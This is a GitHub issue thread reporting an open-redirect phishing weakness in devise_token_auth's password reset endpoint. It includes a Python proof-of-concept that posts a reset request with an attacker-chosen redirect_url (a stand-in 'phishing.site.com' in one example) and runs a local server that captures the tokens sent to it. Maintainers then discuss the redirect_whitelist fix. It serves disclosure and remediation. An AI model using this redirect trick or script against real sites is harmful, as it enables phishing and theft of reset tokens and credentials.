### ISSUE TITLE
Possible Phishing Attack Vulnerability

### ISSUE THREAD

**Issue by timcustard** [lynndylanhurley/devise_token_auth#1287]
Hi,

We're running version 0.1.43 of devise_token_auth, and we've found a possible phishing attack vulnerability. If an attacker sends a victim an email asking them to update their password containing the a link to the following request

requests.post("https://target.website.com/api/auth/password", data={"email":"visitor@target.website.com","redirect_url":"http://phishing.site.com"})

if the user clicks on the link, and enters their details, then those details will be supplied to the attacker's site via the redirect. Is there any way of preventing this, perhaps by ensuring that any redirect_url in the POST request is ignored, and instead re-directed to a known URL?

I've included a complete script to reproduce this issue below:
```
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer
import requests
from termcolor import colored
import urlparse

#victim_email = raw_input(colored("[*] Enter Victims Email > ", "blue"))
# visitor@target.website.com
#print("")
#print(colored("[*] Using this email - " + victim_email, "green"))
raw_input(colored("\n[*] Press Enter to Send Email...", "blue"))

r = requests.post("https://target.website.com/api/auth/password", data={"email":"visitor@target.website.com","redirect_url":"http://127.0.0.1"})
print("")
print(colored("[*] Sending POST Request: \n\n{\"email\":\"visitor@target.website.com\",\"redirect_url\":\"http://127.0.0.1\"} \nTo \n\"https://target.website.com/api/auth/password\"\n", "green"))
print(colored("[*] Got Response Code - " + str(r.status_code), "blue"))
print(colored("[*] JSON Response ----------------------------------------------------\n", "blue"))
print(colored(str(r.text[:300]) + "\n", "green"))
print(colored("[*] ------------------------------------------------------------------\n", "blue"))

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print("")
        if "?" in self.path:
            for key,value in dict(urlparse.parse_qsl(self.path.split("?")[1], True)).items():
                line = key + " = " + value
                print(colored(line + "\n", "green"))

    def do_GET(self):
        self._set_headers()
        self.wfile.write("<h1>:)</h1>")

    def do_HEAD(self):
        self._set_headers()

    def do_POST(self):
        self._set_headers()
        self.wfile.write("<h1>:)</h1>")

def run(server_class=HTTPServer, handler_class=S, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print colored('[*] --------------------- Starting HTTP Server -----------------------\n', "green")
    httpd.serve_forever()

if __name__ == "__main__":
    from sys import argv

    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()
```

**Comment by MaicolBen** [comment]
@timcustard By `re-directed to a known URL`, do you mean the one in the config file?

**Comment by MaicolBen** [comment]
@lynndylanhurley From a security standpoint, do you agree with removing [this line](https://github.com/MaicolBen/devise_token_auth/commit/0b8ad52dfa60b9a99f56f218648f85ea7dccfebc#diff-707f5127db346e2c0b139fdb7bb5f3e5R17) only in the create action? It is a breaking change, so it should be in a future version

**Comment by timcustard** [comment]
> @timcustard By `re-directed to a known URL`, do you mean the one in the config file?

Yes.

**Comment by zachfeldman** [comment]
@lynndylanhurley I agree we should remove that line in future versions

**Comment by lynndylanhurley** [comment]
Don't we have a whitelist for this?

See `redirect_whitelist` in the docs:
https://devise-token-auth.gitbook.io/devise-token-auth/config/initialization

**Comment by zachfeldman** [comment]
@lynndylanhurley good point, that is even slicker!

**Comment by MaicolBen** [comment]
Cool, I forgot about that configuration, closing this, @timcustard reply here if you disagree
